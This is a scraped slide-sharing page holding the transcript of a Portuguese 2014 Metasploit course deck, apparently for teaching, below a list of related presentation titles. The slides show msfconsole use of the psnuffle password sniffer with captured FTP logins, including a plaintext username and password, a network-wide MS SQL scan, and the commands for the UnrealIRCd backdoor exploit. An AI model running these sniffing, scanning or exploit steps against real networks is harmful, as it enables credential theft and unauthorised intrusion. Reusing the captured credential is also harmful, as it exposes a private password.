Metasploit 2 Cerutti-IES 2014 Seja periódico e Consistente. Em tudo, pela vida toda. Principalmente nas questões relativas a segurança Seja periódico e.

Slides:



Advertisements
Similar presentations
Remote Replication Example A: Back up the data to a remote QNAP NAS over the IP network.
Advertisements

Web Hosting Lan Vu. How does a Website work ? Web development concepts Web Design Web Hosting Domain Name.
Overview The TCP/IP Stack. The Link Layer (L2). The Network Layer (L3). The Transport Layer (L4). Port scanning & OS/App detection techniques. Evasion.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
1 Ports and IPv6. 2 Ports Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP), used for communication Generally speaking, a computer.
Creating a RESTful Web Service for Microsoft SQL Server Patrick Mundy, Managing Partner Albert Factora, Managing Partner.
Hacking Linux Based on Hacking Linux Exposed Hatch, Lee, and Kurtz ISBN
Sniffing the sniffers - detecting passive protocol analysers John Baldock, Intel Corp Craig Duffy, Bristol UWE.
Log Analysis and Intrusion Detection By Srikrishna Gudavalli Venkata Naga Vamsi Krishna Ravi Kiran Yellepeddy.
Nikto LUCA ALEXANDRA ADELA. Nikto  Web server assessment tool  Written by Chris Solo and David Lodge  Released on December 27, 2001  Stable release:
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
Lesson 9 Common Windows Exploits. UTSA IS 3523 ID and Incident Response Overview Top 20 Exploits Common Vulnerable Ports Detecting Events.
What is IIS? IIS (Internet Information Server) is a group of Internet servers (including a Web or Hypertext Transfer Protocol server and a File Transfer.
Internet Overview Part II Mrs. Wilson Internet Basics & WAY Beyond!
MIS Week 2 Site:
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
ECE4112 Lab 7: Honeypots and Network Monitoring and Forensics Group 13 + Group 14 Allen Brewer Jiayue (Simon) Chen Daniel Chu Chinmay Patel.
Secure Shell for Computer Science Nick Czebiniak Sung-Ho Maeung.
COEN 350 Security Threats. Network Based Exploits Phases of an Attack  Reconnaissance  Scanning  Gaining Access  Expanding Access  Covering Tracks.
Hacker’s Strategies Revealed WEST CHESTER UNIVERSITY Computer Science Department Yuchen Zhou March 22, 2002.
MIS Week 1 Site:
MIS Week 4 Site:
Linux Networking and Security
Chapter 2 Scanning Last modified Determining If The System Is Alive.
7400 Samsung Confidential & Proprietary Information Copyright 2006, All Rights Reserved. -0/17- OfficeServ 7400 Enterprise IP Solutions Quick Install Guide.
Penetration Testing 101 (Boot-camp)
Topics Network topology Virtual LAN Port scanners and utilities Packet sniffers Weak protocols Practical exercise.
COEN 250 Security Threats. Network Based Exploits Phases of an Attack Reconnaissance Scanning Gaining Access Expanding Access Covering Tracks.
Cisco – Chapter 15 Application Layer closest to you as an end-user, when you are interacting with software.
Retina Network Security Scanner
Unix network Services. Configuring a network interface In Unix there are essentially two commands that are used to enable TCP/IP. ifconfig route.
MIS Week 1 Site:
IT 463 – Scanning Assignment Shane Knisley Erik Bennett.
Application of the Internet 1998/12/09 KEIO University, JAPAN Mikiyo
File Transfer Protocol (FTP) CIS 130. File Transfer Protocol (FTP) Copy files from one internet host (server) to your account on another host –Need domain.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
Network and Port Scanning Chien-Chung Shen
Top 10 Hacking Tool Welcome TO hackaholic Kumar shubham.
Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Penetration Testing Scanning
Nessus Vulnerability Scan
Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
ETHICAL HACKING WHAT EXACTLY IS ETHICAL HACKING ? By : Bijay Acharya
Instructor Materials Chapter 10: Application Layer
MySQL Exploit with Metasploit
Level 2 Diploma Unit 10 Setting up an IT Network
Penetration Test Debrief
Advanced Penetration Testing
Exploiting Metasploitable 2 with Metasploit in Kali-Linux 2016
Packet Sniffers Lecture 10 - NETW4006 NETW4006-Lecture09.
Traffic Analysis with Ethereal
طرق واساليب البحث في الانترنت
How data travels through a network The Internet
Module 22 (Metasploit Introduction)
CIT 480: Securing Computer Systems
Metasploit assignment
Exploiting Metasploitable
Penetration Testing 10/12/2018 Penetration Testing.
Penetration Testing 10/12/2018 Penetration Testing.
Chapter 4 Core TCP/IP Protocols
TÌM HiỂU CÁC HÌNH THỨC VÀ KỸ THUẬT TẤN CÔNG
Analysis Report Kali Linux Metasploit
Backtrack Metasploit and SET
Metasploit Assignment
Web Application Penetration Testing ‘17
Metasploit Analysis Report Overview
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Metasploit assignment – Arkadiy Kantor – Mis-5212
Presentation transcript:

Metasploit 2 Cerutti-IES 2014 Seja periódico e Consistente. Em tudo, pela vida toda. Principalmente nas questões relativas a segurança Seja periódico e Consistente. Em tudo, pela vida toda. Principalmente nas questões relativas a segurança

O Que caracteriza um bom Framework?

frameworks

SQL Microsoft

Cargas disponíveis

Saindo (descarregando) módulos Comando=back:

Password Sniffing > use auxiliary/sniffer/psnuffle msf > use auxiliary/sniffer/psnuffle msf auxiliary(psnuffle) > run [*] Auxiliary module execution completed [*] Loaded protocol FTP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/ftp.rb... [*] Loaded protocol IMAP from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/imap.rb... [*] Loaded protocol POP3 from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/pop3.rb... [*] Loaded protocol SMB from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/smb.rb... msf auxiliary(psnuffle) > [*] Loaded protocol URL from /opt/metasploit/apps/pro/msf3/data/exploits/psnuffle/url.rb... [*] Sniffing traffic..... host_int= &ns_map= _ %2C _ &user_id= &nid= &ts= [*] Failed FTP Login: : :21 >> fernandocerutti / baguinha

[*] HTTP GET: : : %2C _ &user_id= &nid= &ts= [*] Successful FTP Login: : :21 >> anonymous / [*] HTTP GET: : : %2C _ &user_id= &nid= &ts= [*] Successful FTP Login: : :21 >> anonymous / caraca

http sem segurança- em texto plano [*] HTTP GET: : :80 analytics.com/__utm.gif?utmwv=5.6.0&utms=7&utmn= &utmhn= deshare.net&utmt =event&utme=5(search_content*search_pageload*Description %20HL%20Percentage)(216)8(member_type)9(FREE)11(1)&utmcs=UTF- 8&utmsr=1280x800&utmvp=1091x648&utmsc=24-bit&utmul=en- us&utmje=1&utmfl=15.0%20r0&utmdt=%27 metasploit %27%20on%20SlideShare&ut mhid= &utmr=0&utmp=%2Fsearch%2Fslideshow%3Fsearchfrom%3Dheader %26q%3Dmetasploit&utmht= &utmac=UA &utmcc=__utma%3D %3B%2B__utmz%3D utmcsr%3Dgoogle%7Cutmccn%3D(or ganic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B%2B__utmv%3D member%3B&utmjid=&utmu=6RAAACAAAAAAAAAAAAAAAAAE~ [*] HTTP GET: : :80 E5saE0q8AysNEyZiXdMtJwzLZrrD-93ly2lmHo0qH_eNWClKa8vX-zMT3w

sniff ] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80 [*] HTTP GET: : :80

Ms SQL msf > nmap -sU /24 -p1434 [*] exec: nmap -sU /24 -p1434 Starting Nmap 6.46 ( ) at :26 PST Nmap scan report for Host is up (0.049s latency). PORT STATE SERVICE 1434/udp open|filtered ms-sql-m MAC Address: 84:C9:B2:55:A7:03 (D-Link International) Nmap scan report for Host is up (0.0053s latency). PORT STATE SERVICE 1434/udp closed ms-sql-m MAC Address: 00:0C:29:6F:8D:07 (VMware) Nmap scan report for Host is up (0.17s latency). PORT STATE SERVICE 1434/udp open|filtered ms-sql-m MAC Address: 64:6C:B2:4E:62:B3 (Samsung Electronics Co.)

msf > use scanner/mssql/mssql_ping msf auxiliary(mssql_ping) > set RHOSTS /24 RHOSTS => /24 msf auxiliary(mssql_ping) > set THREADS 20 THREADS => 20 msf auxiliary(mssql_ping) > exploit [*] Scanned 026 of 256 hosts (010% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 079 of 256 hosts (030% complete) [*] Scanned 104 of 256 hosts (040% complete) [*] Scanned 141 of 256 hosts (055% complete) [*] Scanned 154 of 256 hosts (060% complete) [*] Scanned 182 of 256 hosts (071% complete) [*] Scanned 206 of 256 hosts (080% complete) [*] Scanned 244 of 256 hosts (095% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(mssql_ping) >

Backdoor no linux use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > msf exploit(unreal_ircd_3281_backdoor) > set RHOST RHOST => msf exploit(unreal_ircd_3281_backdoor) > exploit

Saida exploit backdoor

Dotdefender Wget